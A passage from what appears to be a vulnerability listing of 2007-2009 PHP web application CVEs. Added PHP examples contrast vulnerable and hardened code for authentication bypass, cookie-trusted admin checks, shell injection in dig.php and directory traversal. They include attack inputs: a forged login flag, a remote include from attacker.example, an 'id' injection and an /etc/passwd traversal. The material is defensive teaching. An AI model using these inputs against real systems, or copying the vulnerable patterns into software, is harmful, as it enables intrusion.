login.php in Zenas PaoLiber 1.1, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.
28-09-2009 - 00:00 25-09-2009 - 18:30
CVE-2009-3421 6.8
login.php in Zenas PaoBacheca Guestbook 2.1, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.
28-09-2009 - 00:00 25-09-2009 - 18:30
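The three Zenas entries above (authentication bypass by sending login_ok=1) and, earlier in the list, the Pivot, pppBLOG, SugarCRM, Limbo, GuppY and Mambo entries all stem from request parameters becoming PHP variables the application never initialised, either through register_globals or through an application-level extract() on the request arrays. The block below is an added example written for this page, not code from any of those projects. It emulates that behaviour on a current PHP CLI (register_globals itself was removed in PHP 5.4; extract() still exists) for the two sinks the entries describe, an uninitialised privilege flag and a configuration path. The variable names $login_ok and $template_dir, the admin credentials and the template directory are illustrative assumptions. The PHP 4-era overwrite of $_SERVER itself, as in the Limbo and GuppY entries, is not reproduced here because current PHP resolves superglobals outside the local symbol table.

```php
<?php
declare(strict_types=1);
// Added example, not code from Zenas, Limbo, GuppY, SugarCRM or Mambo.
// Emulates what register_globals (removed in PHP 5.4) or an application-level
// extract($_GET)/extract($_REQUEST) did: every request key becomes a PHP
// variable. $login_ok, $template_dir and the admin credentials are
// illustrative names chosen for this demonstration.

define('APP_TEMPLATES', '/var/www/app/templates');

// --- Vulnerable: state that is only assigned on the success path.
function vulnerableLogin(array $request): array
{
    extract($request);   // register_globals emulation (EXTR_OVERWRITE)

    if (isset($username, $password) && $username === 'admin' && $password === 'secret') {
        $login_ok = 1;
    }
    // Nothing assigns $login_ok on failure, so "?login_ok=1" arrives pre-set.
    // extract($request, EXTR_SKIP) would not help: there is no existing
    // variable to collide with, which is exactly the uninitialised case.
    $isAdmin = isset($login_ok) && (int) $login_ok === 1;

    // Same root cause, different sink: a config variable that the include
    // path is built from (the Mambo mosConfig_absolute_path pattern), so
    // "?template_dir=http://attacker.example/tpl" turns this into a remote include.
    $template = ($template_dir ?? APP_TEMPLATES) . '/main.php';

    return ['admin' => $isAdmin, 'template' => $template];
}

// --- Hardened: explicit reads, state initialised before use, privilege
// kept server-side, paths never derived from request-named variables.
function hardenedLogin(array $request, array &$session): array
{
    $username = (string) ($request['username'] ?? '');
    $password = (string) ($request['password'] ?? '');

    $loginOk = false;
    if ($username === 'admin' && hash_equals('secret', $password)) {
        $loginOk = true;
    }
    $session['is_admin'] = $loginOk;

    return ['admin' => $session['is_admin'], 'template' => APP_TEMPLATES . '/main.php'];
}

// Constructed request: no credentials at all, just the forged flag and path.
$forged = ['login_ok' => '1', 'template_dir' => 'http://attacker.example/tpl'];

$v = vulnerableLogin($forged);
printf("vulnerable: admin=%s template=%s\n", var_export($v['admin'], true), $v['template']);

$session = [];
$h = hardenedLogin($forged, $session);
printf("hardened:   admin=%s template=%s\n", var_export($h['admin'], true), $h['template']);
```

Run it with the PHP CLI. The practical audit rule that falls out of this: grep for extract(), for import_request_variables() and for "register_globals" in any legacy code base, and treat every variable that is read before it is assigned on all paths as attacker-controlled until proven otherwise.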
CVE-2009-3217 7.5
SQL injection vulnerability in the admin module in iWiccle 1.01 allows remote attackers to execute arbitrary SQL commands via the member_id parameter in an edit_user action to index.php.
17-09-2009 - 00:00 16-09-2009 - 15:30
CVE-2009-3216 4.3
Multiple directory traversal vulnerabilities in iWiccle 1.01, when magic_quotes_gpc is disabled, allow remote attackers to read arbitrary files via a .. (dot dot) in (1) the show parameter to the admin module, reachable through index.php; or (2) the
17-09-2009 - 00:00 16-09-2009 - 15:30
CVE-2008-4549 2.6
The ImageShack Toolbar ActiveX control (ImageShackToolbar.dll) in ImageShack Toolbar 4.5.7, possibly including 4.5.7.69, allows remote attackers to force the upload of arbitrary image files to the ImageShack site via a file: URI argument to the Build
15-09-2009 - 01:19 14-10-2008 - 14:12
CVE-2008-4547 9.3
Heap-based buffer overflow in the PdvrAtl.PdvrOcx.1 ActiveX control (pdvratl.dll) in DVRHOST Web CMS OCX 1.0.1.25 allows remote attackers to execute arbitrary code via a long second argument to the TimeSpanFormat method.
15-09-2009 - 01:19 14-10-2008 - 14:12
CVE-2009-3158 7.5
admin/files.php in simplePHPWeb 0.2 does not require authentication, which allows remote attackers to perform unspecified administrative actions via unknown vectors. NOTE: some of these details are obtained from third party information.
11-09-2009 - 00:00 10-09-2009 - 14:30
CVE-2009-3148 7.5
Multiple SQL injection vulnerabilities in PortalXP Teacher Edition 1.2 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) calendar.php, (2) news.php, and (3) links.php; and the (4) assignment_id parameter to assignme
10-09-2009 - 00:00 10-09-2009 - 14:30
CVE-2008-7153 7.5
SQL injection vulnerability in the autoDetectRegion function in doceboCore/lib/lib.regset.php in Docebo 3.5.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via the Accept-Language HTTP header. NOTE: this can be leveraged to
02-09-2009 - 00:00 02-09-2009 - 13:30
CVE-2008-3926 5.8
Multiple directory traversal vulnerabilities in Content Management Made Easy (CMME) 1.12 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the env parameter in a weblog action to index.php, or (2) create arbitrary directories v
01-09-2009 - 01:19 04-09-2008 - 14:41
CVE-2008-7058 6.8
Cross-site request forgery (CSRF) vulnerability in BandSite CMS 1.1.4 allows remote attackers to hijack the authentication of administrators and force a logout via adminpanel/logout.php.
29-08-2009 - 01:23 24-08-2009 - 15:30
CVE-2008-7057 4.3
Cross-site scripting (XSS) vulnerability in merchandise.php in BandSite CMS 1.1.4 allows remote attackers to inject arbitrary HTML or web script via the type parameter.
29-08-2009 - 01:23 24-08-2009 - 15:30
CVE-2008-7056 5.0
BandSite CMS 1.1.4 does not perform access control for adminpanel/phpmydump.php, which allows remote attackers to obtain copies of the database via a direct request.
27-08-2009 - 00:00 24-08-2009 - 15:30
CVE-2009-2123 7.5
Multiple SQL injection vulnerabilities in Elvin 1.2.0 allow remote attackers to execute arbitrary SQL commands via the (1) inUser (aka Username) and (2) inPass (aka Password) parameters to (a) inc/login.ei, reachable through login.php; and the (3) id
24-08-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2921 7.5
Multiple SQL injection vulnerabilities in login.php in MOC Designs PHP News 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) newsuser parameter (User field) and (2) newspassword parameter (Password field).
21-08-2009 - 00:00 21-08-2009 - 07:30
CVE-2008-4175 6.5
Multiple SQL injection vulnerabilities in Link Bid Script 1.5 allow remote attackers to execute arbitrary SQL commands via the (1) ucat parameter to upgrade.php and the (2) id parameter to linkadmin/edit.php.
20-08-2009 - 01:20 23-09-2008 - 11:25
CVE-2008-6162 7.5
Bux.to Clone script allows remote attackers to bypass authentication and gain administrative access by setting the loggedin cookie to 1 and the usNick cookie to admin.
19-08-2009 - 01:23 20-02-2009 - 01:46
CVE-2008-6126 5.0
Multiple directory traversal vulnerabilities in moziloCMS 1.10.2 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) file parameter to download.php and the (2) page parameter to index.php, a different vector than
19-08-2009 - 01:23 13-02-2009 - 13:30
CVE-2008-6011 7.5
SQL injection vulnerability in index.php in SG Real Estate Portal 2.0 allows remote attackers to execute arbitrary SQL commands via the page_id parameter.
19-08-2009 - 01:22 30-01-2009 - 13:30
CVE-2008-6010 5.0
Multiple directory traversal vulnerabilities in SG Real Estate Portal 2.0 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) mod, (2) page, or (3) lang parameter to index.php; or the (4) action or (5) folder parameter in a s
19-08-2009 - 01:22 30-01-2009 - 13:30
CVE-2008-4169 7.5
SQL injection vulnerability in detaillist.php in iScripts EasyIndex, possibly 1.0, allows remote attackers to execute arbitrary SQL commands via the produid parameter.
19-08-2009 - 01:19 22-09-2008 - 14:34
CVE-2008-4155 7.8
Multiple directory traversal vulnerabilities in EasySite 2.3 allow remote attackers to read arbitrary files or list directories via a .. (dot dot) in the (1) module or (2) action parameter in (a) www/index.php; the (3) module, (4) ss_module, or (5) s
19-08-2009 - 01:19 19-09-2008 - 19:00
CVE-2008-4115 5.0
TalkBack 2.3.6 allows remote attackers to obtain configuration information via a direct request to install/info.php, which calls the phpinfo function.
19-08-2009 - 01:19 16-09-2008 - 19:00
CVE-2008-7006 5.0
Free PHP VX Guestbook 1.06 allows remote attackers to bypass authentication and download a backup of the database via a direct request to admin/backupdb.php.
19-08-2009 - 00:00 19-08-2009 - 06:30
CVE-2009-2792 7.5
Directory traversal vulnerability in plugings/pagecontent.php in Really Simple CMS (RSCMS) 0.3a allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PT parameter.
18-08-2009 - 00:00 17-08-2009 - 12:30
CVE-2009-2784 9.3
Multiple directory traversal vulnerabilities in dit.cms 1.3, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the path parameter to index.php in (1) install/, (2) menus/left_r
17-08-2009 - 00:00 17-08-2009 - 12:30
CVE-2009-2736 6.5
Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action.
11-08-2009 - 00:00 11-08-2009 - 06:30
CVE-2009-2735 6.8
SQL injection vulnerability in admin.php in sun-jester OpenNews 1.0, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
11-08-2009 - 00:00 11-08-2009 - 06:30
CVE-2008-6906 4.3
Cross-site scripting (XSS) vulnerability in index.php in BabbleBoard 1.1.6 allows remote attackers to inject arbitrary web script or HTML via the username.
06-08-2009 - 00:00 06-08-2009 - 13:30
CVE-2008-6905 6.0
Cross-site request forgery (CSRF) vulnerability in index.php in BabbleBoard 1.1.6 allows remote authenticated users to hijack the authentication of administrators for requests that delete (1) categories or (2) groups; (3) ban users; or (4) delete use
06-08-2009 - 00:00 06-08-2009 - 13:30
CVE-2009-2382 7.5
admin.php in phpMyBlockchecker 1.0.0055 allows remote attackers to bypass authentication and gain administrative access by setting the PHPMYBCAdmin cookie to LOGGEDIN.
16-07-2009 - 00:00 08-07-2009 - 11:30
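CVE-2008-6162 and CVE-2009-2382 above describe the same defect: the application decides whether a visitor is the administrator by reading a flag the visitor's own browser sent. The block below is an added example written for this page, not code from Bux.to Clone, phpMyBlockchecker or any other listed product; the cookie names follow the CVE text, while the user table, the session store and the password are constructed for the demonstration.

```php
<?php
// Added example for this page; not code from any listed product.

// Vulnerable: authorization is decided by values the client chose to send.
// Anyone can set these two cookies by hand, no password involved.
function is_admin_vulnerable(array $cookie): bool
{
    return isset($cookie['loggedin'], $cookie['usNick'])
        && $cookie['loggedin'] === '1'
        && $cookie['usNick'] === 'admin';
}

// Hardened: the cookie carries only an opaque session id; the role lives in
// server-side state that the login handler wrote after checking a password.
// $sessions stands in for that server-side store, keyed by session id.
function is_admin_safe(array $cookie, array $sessions): bool
{
    if (!isset($cookie['sid']) || !is_string($cookie['sid'])) {
        return false;
    }
    $session = $sessions[$cookie['sid']] ?? null;
    return $session !== null && ($session['role'] ?? '') === 'admin';
}

// Login handler the hardened check depends on: verify the stored hash, then
// record the role server-side and hand out an unguessable id.
function login(string $user, string $password, array $users, array &$sessions): ?string
{
    if (!isset($users[$user]) || !password_verify($password, $users[$user]['hash'])) {
        return null;
    }
    $sid = bin2hex(random_bytes(32));
    $sessions[$sid] = ['user' => $user, 'role' => $users[$user]['role']];
    return $sid;
}

// Constructed demonstration data (assumed account and password).
$users = [
    'admin' => ['hash' => password_hash('correct horse', PASSWORD_DEFAULT), 'role' => 'admin'],
];
$sessions = [];

// Attacker-chosen cookies, sent without ever logging in.
$forged = ['loggedin' => '1', 'usNick' => 'admin'];
var_dump(is_admin_vulnerable($forged));          // the client's own claim is believed
var_dump(is_admin_safe($forged, $sessions));     // no server-side session exists

// A real login creates the session the safe check looks for.
$sid = login('admin', 'correct horse', $users, $sessions);
var_dump(is_admin_safe(['sid' => $sid], $sessions));
```

The point to carry away is where the decision is stored: anything in a cookie, hidden form field or query string is attacker-writable, so the only thing the client may hold is a random identifier whose meaning is looked up on the server.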
CVE-2009-2263 7.5
Directory traversal vulnerability in index.php in Awesome PHP Mega File Manager 1.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter. NOTE: in some environments, this can be leveraged for
30-06-2009 - 00:00 30-06-2009 - 06:30
CVE-2009-2154 6.8
SQL injection vulnerability in admin/login.php in Impleo Music Collection 2.0, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2153 4.3
Cross-site scripting (XSS) vulnerability in index.php in Impleo Music Collection 2.0 allows remote attackers to inject arbitrary web script or HTML via the sort parameter.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2152 7.5
SQL injection vulnerability in a_index.php in AdaptWeb 0.9.2 allows remote attackers to execute arbitrary SQL commands via the CodigoDisciplina parameter in a TopicosCadastro1 action.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2151 5.0
Directory traversal vulnerability in index.php in AdaptWeb 0.9.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the newlang parameter.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2130 5.0
Elvin 1.2.0 allows remote attackers to read the PHP source code of (1) login.ei, (2) jump_bug.ei, or (3) create_account.ei in inc/ via a direct request.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2129 6.8
Cross-site request forgery (CSRF) vulnerability in login.php in Elvin 1.2.0 allows remote attackers to hijack the authentication of arbitrary users via a logout action.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2127 4.3
Cross-site scripting (XSS) vulnerability in show_activity.php in Elvin 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2124 7.5
Directory traversal vulnerability in page.php in Elvin 1.2.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the id parameter.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2111 10.0
Static code injection vulnerability in add_reg.php in DB Top Sites 1.0 allows remote attackers to inject arbitrary PHP code via a crafted (1) url and (2) location parameter.
19-06-2009 - 00:00 18-06-2009 - 17:30
CVE-2009-2110 7.6
Multiple directory traversal vulnerabilities in DB Top Sites 1.0, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the u parameter to (1) full.php, (2) index.php, and (3) con
19-06-2009 - 00:00 18-06-2009 - 17:30
CVE-2009-2096 7.5
SQL injection vulnerability in house/listing_view.php in phpCollegeExchange 0.1.5c allows remote attackers to execute arbitrary SQL commands via the itemnr parameter.
18-06-2009 - 00:00 17-06-2009 - 13:30
CVE-2009-1406 6.8
Directory traversal vulnerability in cms_detect.php in TotalCalendar 2.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the include parameter.
15-06-2009 - 00:00 24-04-2009 - 10:30
CVE-2009-1952 6.8
Multiple SQL injection vulnerabilities in the administrative login feature in PropertyMax Pro FREE 0.3, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
08-06-2009 - 00:00 05-06-2009 - 17:30
CVE-2009-1951 4.3
Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action.
08-06-2009 - 00:00 05-06-2009 - 17:30
CVE-2009-1916 10.0
dig.php in GScripts.net DNS Tools allows remote attackers to execute arbitrary commands via shell metacharacters in the ns parameter.
05-06-2009 - 00:00 04-06-2009 - 13:30
CVE-2009-1817 9.3
Multiple buffer overflows in DigiMode Maya 1.0.2 allow remote attackers to execute arbitrary code via a long string in a malformed (1) .m3u or (2) .m3l playlist file.
01-06-2009 - 00:00 29-05-2009 - 12:30
CVE-2009-1519 5.0
Directory traversal vulnerability in index.php in Pecio CMS 1.1.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the language parameter.
16-05-2009 - 01:32 04-05-2009 - 15:00
CVE-2009-1486 7.5
Directory traversal vulnerability in pmscript.php in Flatchat 3.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the with parameter.
13-05-2009 - 01:28 29-04-2009 - 14:30
CVE-2009-1625 6.8
Directory traversal vulnerability in index.php in Thickbox Gallery 2 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ln parameter.
13-05-2009 - 00:00 12-05-2009 - 12:30
CVE-2009-1607 4.3
Cross-site scripting (XSS) vulnerability in the administrator panel in phpForm.net LinkBase 2.0 allows remote attackers to inject arbitrary web script or HTML via the username in a registration, which is not properly handled when the administrator ac
12-05-2009 - 00:00 11-05-2009 - 16:00
CVE-2009-1550 5.0
Zakkis Technology ABC Advertise 1.0 does not properly restrict access to admin.inc.php, which allows remote attackers to obtain the administrator login name and password via a direct request.
07-05-2009 - 00:00 06-05-2009 - 11:30
CVE-2009-1405 6.8
Directory traversal vulnerability in index.php in PastelCMS 0.8.0, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the set_lng parameter.
24-04-2009 - 00:00 24-04-2009 - 10:30
CVE-2009-1404 6.8
SQL injection vulnerability in admin.php in PastelCMS 0.8.0, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the user (Username) parameter.
24-04-2009 - 00:00 24-04-2009 - 10:30
CVE-2009-1369 5.0
moziloCMS 1.11 allows remote attackers to obtain sensitive information via the (1) gal[] parameter to gallery.php, (2) page[] and (3) cat[] parameter to index.php, or (4) file[] parameter to download.php, which reveals the installation path in an err
23-04-2009 - 00:00 22-04-2009 - 17:30
CVE-2009-1368 7.5
Directory traversal vulnerability in index.php in moziloCMS 1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter. NOTE: this might be the same issue as CVE-2008-6126.2, which may have been fixed in 1.10.3.
23-04-2009 - 00:00 22-04-2009 - 17:30
CVE-2009-1367 4.3
Cross-site scripting (XSS) vulnerability in index.php in moziloCMS 1.11 allows remote attackers to inject arbitrary web script or HTML via the query parameter in search action, a different issue than CVE-2008-6127.2a.
23-04-2009 - 00:00 22-04-2009 - 17:30
CVE-2009-1361 10.0
dig.php in GScripts.net DNS Tools allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
23-04-2009 - 00:00 22-04-2009 - 14:30
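CVE-2009-1916 and CVE-2009-1361 above both concern dig.php passing a request parameter into a shell command. The block below is an added example written for this page, not the GScripts.net DNS Tools code; the function names, the validation policy and the sample inputs are assumptions.

```php
<?php
// Added example for this page; not the DNS Tools code.

// Vulnerable: host and name server are interpolated into a shell command
// line. A value such as "8.8.8.8; id" or "$(id)" runs id as the web server
// user, because the shell parses the metacharacters before dig ever runs.
function dig_command_vulnerable(string $host, string $ns): string
{
    return "dig @$ns $host";
}

// Hardened, in two layers:
//  1. accept only what a host name or IP address can look like (this also
//     rules out a leading "-", which dig would read as an option);
//  2. escapeshellarg() each argument anyway, so the shell sees exactly one
//     quoted word per argument whatever slipped through step 1.
function valid_host_or_ip(string $s): bool
{
    return filter_var($s, FILTER_VALIDATE_IP) !== false
        || filter_var($s, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

function dig_command_safe(string $host, string $ns): ?string
{
    if (!valid_host_or_ip($host) || !valid_host_or_ip($ns)) {
        return null;
    }
    return 'dig ' . escapeshellarg('@' . $ns) . ' ' . escapeshellarg($host);
}

// Best: no shell at all. proc_open() accepts an argv array (PHP >= 7.4) and
// executes the program directly, so there is nothing to inject into.
function dig_argv(string $host, string $ns): ?array
{
    if (!valid_host_or_ip($host) || !valid_host_or_ip($ns)) {
        return null;
    }
    return ['dig', '@' . $ns, $host];
}

// Constructed inputs: one injection attempt, one legitimate query.
echo dig_command_vulnerable('example.com', '8.8.8.8; id'), "\n";
var_export(dig_command_safe('example.com', '8.8.8.8; id'));   // rejected by validation
echo "\n";
echo dig_command_safe('example.com', '8.8.8.8'), "\n";
var_export(dig_argv('example.com', '8.8.8.8'));
echo "\n";
```

Validation alone is not the fix: it narrows the input, but the quoting (or better, the argv form that never invokes a shell) is what guarantees the command structure cannot change.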
CVE-2008-6726 6.0
Multiple directory traversal vulnerabilities in CMScout 2.06, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the bit parameter to (1) admin.php and (2) index.php, different
17-04-2009 - 10:48 17-04-2009 - 10:08
CVE-2009-1319 7.5
Directory traversal vulnerability in includes/ini.inc.php in GuestCal 2.1 allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the lang parameter to index.php.
17-04-2009 - 00:00 17-04-2009 - 10:08
CVE-2008-6725 6.0
Multiple SQL injection vulnerabilities in CMScout 2.06 allow remote authenticated users to execute arbitrary SQL commands via the id parameter to (1) index.php in a mythings page (mythings.php) and (2) the users page in admin.php.
17-04-2009 - 00:00 17-04-2009 - 10:08
CVE-2009-1248 7.5
Multiple PHP remote file inclusion vulnerabilities in Acute Control Panel 1.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the theme_directory parameter to (1) container.php and (2) header.php in themes/.
07-04-2009 - 00:00 06-04-2009 - 12:30
CVE-2009-1247 7.5
SQL injection vulnerability in login.php in Acute Control Panel 1.0.0 allows remote attackers to execute arbitrary SQL commands via the username parameter.
07-04-2009 - 00:00 06-04-2009 - 12:30
CVE-2005-2813 5.0
Directory traversal vulnerability in FlatNuke 2.5.6 and possibly earlier allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) characters in the id parameter to the read mod in index.php.
03-04-2009 - 00:40 07-09-2005 - 14:03
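The directory traversal entries above, from CVE-2009-2792 and CVE-2009-2263 through CVE-2009-1405 (conditional on magic_quotes_gpc being disabled) and CVE-2005-2813 (with its trailing %00), all describe one include pattern. The block below is an added example written for this page, not code from any of the listed products; the pages/ layout, the page names and the attack string are assumptions, and the pre-5.3.4 NUL behaviour is emulated rather than exercised because current PHP refuses such paths.

```php
<?php
// Added example for this page; not code from any listed product.
// Assumed layout: the application includes <base>/pages/<page>.php.

// Vulnerable form: user input is spliced into the include path. "../"
// walks out of pages/, and before PHP 5.3.4 a NUL byte in the path ended
// the filename at the C level, so the appended ".php" was never seen.
function page_path_vulnerable(string $base, string $page): string
{
    return $base . '/pages/' . $page . '.php';
}

// What the filesystem received before PHP 5.3.4: the path up to the first
// NUL. PHP >= 5.3.4 rejects include()/fopen() paths that contain NUL instead.
function path_as_opened_pre_5_3_4(string $path): string
{
    $nul = strpos($path, "\0");
    return $nul === false ? $path : substr($path, 0, $nul);
}

// magic_quotes_gpc (removed in PHP 5.4) ran addslashes() over GET, POST and
// cookie data, turning the NUL into a literal backslash-zero. That is why
// several entries above apply only "when magic_quotes_gpc is disabled".
function magic_quotes_gpc_emulated(string $raw): string
{
    return addslashes($raw);
}

// Hardened form: reject NUL and anything but a plain name, then confirm that
// the resolved path still lies inside the pages directory.
function page_path_safe(string $base, string $page): ?string
{
    if (strpos($page, "\0") !== false || !preg_match('/^[A-Za-z0-9_-]+$/', $page)) {
        return null;
    }
    $dir  = realpath($base . '/pages');
    $real = realpath($base . '/pages/' . $page . '.php');
    if ($dir === false || $real === false
        || strncmp($real, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return null;   // missing file, or resolved outside pages/
    }
    return $real;
}

// Constructed demonstration input (assumed base directory and attack string).
$base   = '/var/www/app';
$attack = "../../../../etc/passwd\0";

// Traversal plus NUL: the ".php" suffix no longer reaches the filesystem.
var_export(path_as_opened_pre_5_3_4(page_path_vulnerable($base, $attack)));
echo "\n";
// With magic_quotes_gpc on, the NUL became "\0" and the suffix survives.
var_export(page_path_vulnerable($base, magic_quotes_gpc_emulated($attack)));
echo "\n";
// The hardened form rejects the input before touching the filesystem.
var_export(page_path_safe($base, $attack));
echo "\n";
```

The entries that say "include and execute arbitrary local files" rather than "read arbitrary files" are the cases where the traversed path goes to include() instead of readfile(): any file the web server can read, a log or an uploaded image with PHP inside it, is then parsed as code.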
CVE-2009-1038 6.5
Multiple SQL injection vulnerabilities in YAP Blog 1.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) image_id parameter to comments.php, and remote authenticated administrators to execute arbitrary SQL commands via the (2) us
02-04-2009 - 01:45 20-03-2009 - 14:30
CVE-2009-1025 7.5
PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.
26-03-2009 - 00:00 19-03-2009 - 20:30
CVE-2009-1024 7.5
Multiple SQL injection vulnerabilities in Beerwin PHPLinkAdmin 1.0 allow remote attackers to execute arbitrary SQL commands via the linkid parameter to edlink.php, and unspecified other vectors.
26-03-2009 - 00:00 19-03-2009 - 20:30
CVE-2008-3593 7.5
Directory traversal vulnerability in index.php in SyzygyCMS 0.3 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.
18-03-2009 - 01:40 11-08-2008 - 19:41
CVE-2008-3859 5.0
Davlin Thickbox Gallery 2 allows remote attackers to obtain the administrative username and MD5 password hash via a direct request to conf/admins.php.
13-03-2009 - 01:39 29-08-2008 - 12:41
CVE-2008-6336 4.3
Directory traversal vulnerability in download.php in Text Lines Rearrange Script 1.0, when register_globals is enabled, allows remote attackers to read arbitrary local files via directory traversal sequences in the filename parameter.
02-03-2009 - 00:00 27-02-2009 - 12:30
CVE-2009-0735 5.1
Directory traversal vulnerability in lib/classes/message_class.php in Papoo CMS 3.6, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to read and possibly execute arbitrary files via a .. (dot dot) in the pfa
25-02-2009 - 00:00 25-02-2009 - 15:30
CVE-2008-3924 4.3
The "Make a backup" functionality in Content Management Made Easy (CMME) 1.12 stores sensitive information under the web root with insufficient access control, which allows remote attackers to discover (1) account names and (2) password hashes via a
17-02-2009 - 01:50 04-09-2008 - 14:41
CVE-2009-0571 5.0
admin.php in Ninja Designs Mailist 3.0 stores backup copies of maillist.php under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the backup directory.
17-02-2009 - 00:00 13-02-2009 - 12:30
CVE-2009-0570 5.1
Directory traversal vulnerability in send.php in Ninja Designs Mailist 3.0, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the load paramet
17-02-2009 - 00:00 13-02-2009 - 12:30
CVE-2007-4814 7.5
Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argu
05-02-2009 - 01:30 11-09-2007 - 15:17
CVE-2009-0383 6.4
delete.php in Max.Blog 1.0.6 does not properly restrict access, which allows remote attackers to delete arbitrary blog posts via a direct request.
02-02-2009 - 00:00 02-02-2009 - 14:30
CVE-2008-4548 9.3
Stack-based buffer overflow in the PTZCamPanelCtrl ActiveX control (CamPanel.dll) in RTS Sentry 2.1.0.2 allows remote attackers to execute arbitrary code via a long second argument to the ConnectServer method.
29-01-2009 - 01:56 14-10-2008 - 14:12
CVE-2008-4526 10.0
Multiple directory traversal vulnerabilities in CCMS 3.1 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skin parameter to (1) index.php, (2) forums.php, (3) admin.php, (4) header.php, (5) pages/story.php
29-01-2009 - 01:56 09-10-2008 - 14:14
CVE-2008-4522 7.5
Multiple directory traversal vulnerabilities in JMweb MP3 Music Audio Search and Download Script allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the src parameter to (1) listen.php and (2) download.php.
29-01-2009 - 01:56 09-10-2008 - 14:14
CVE-2008-4158 6.8
Multiple directory traversal vulnerabilities in index.php in Zanfi CMS lite 1.2 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) flag and (2) inc parameters.
29-01-2009 - 01:55 22-09-2008 - 14:34
CVE-2008-4075 6.8
Directory traversal vulnerability in index.php in D-iscussion Board 3.01 allows remote attackers to read arbitrary files via a .. (dot dot) in the topic parameter.
29-01-2009 - 01:55 15-09-2008 - 11:14
CVE-2008-3925 4.3
Cross-site request forgery (CSRF) vulnerability in admin.php in Content Management Made Easy (CMME) 1.12 allows remote attackers to trigger the logout of an administrative user via a logout action.
29-01-2009 - 01:54 04-09-2008 - 14:41
CVE-2008-3923 4.3
Multiple cross-site scripting (XSS) vulnerabilities in statistics.php in Content Management Made Easy (CMME) 1.12 allow remote attackers to inject arbitrary web script or HTML via the (1) page and (2) year parameters in an hstat_year action.
29-01-2009 - 01:54 04-09-2008 - 14:41
CVE-2007-5845 7.5
Directory traversal vulnerability in error.php in GuppY 4.6.3, 4.5.16, and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the id parameter. NOTE: this can be leveraged to bypass authentication and
15-11-2008 - 02:02 06-11-2007 - 16:46
CVE-2007-5070 10.0
Heap-based buffer overflow in the EasyMailMessagePrinter ActiveX control in emprint.DLL 6.0.1.0 in the Quiksoft EasyMail MessagePrinter Object allows remote attackers to execute arbitrary code via a long string in the first argument to the SetFont me
15-11-2008 - 01:59 24-09-2007 - 19:17
CVE-2007-3167 7.6
Stack-based buffer overflow in the Vivotek Motion Jpeg ActiveX control (aka MjpegControl) in MjpegDecoder.dll 2.0.0.13 allows remote attackers to execute arbitrary code via a long PtzUrl property value.
15-11-2008 - 01:51 11-06-2007 - 18:30
CVE-2007-2667 9.3
Buffer overflow in the DB Software Laboratory VImpX ActiveX control in VImpX.ocx 4.7.3 allows remote attackers to execute arbitrary code via a long LogFile parameter.
